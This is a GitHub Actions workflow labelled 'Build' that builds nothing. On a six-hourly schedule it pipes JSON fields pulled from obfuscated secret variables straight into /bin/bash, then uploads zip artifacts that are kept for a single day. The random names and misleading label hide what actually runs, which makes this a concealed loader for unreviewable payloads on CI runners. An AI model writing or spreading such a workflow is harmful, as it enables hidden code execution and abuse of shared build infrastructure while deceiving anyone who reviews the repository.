name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '4 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          xddzn63118: ${{ secrets.xddzn63118 }}
        run: |
          printf '%s' "$xddzn63118" | jq -r .uvq28 | /bin/bash
          printf '%s' "$lcker252" | jq -r .so90 | /bin/bash
          printf '%s' "$ze30710" | jq -r .w3 | /bin/bash
          printf '%s' "$pd1813" | jq -r .kjk777 | /bin/bash
          printf '%s' "$ojc57" | jq -r .y69217 | /bin/bash
          echo $qvg020 | jq -r .fdmcq828 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: JEwQDLIq
          path: "*.zip"
          retention-days: 1
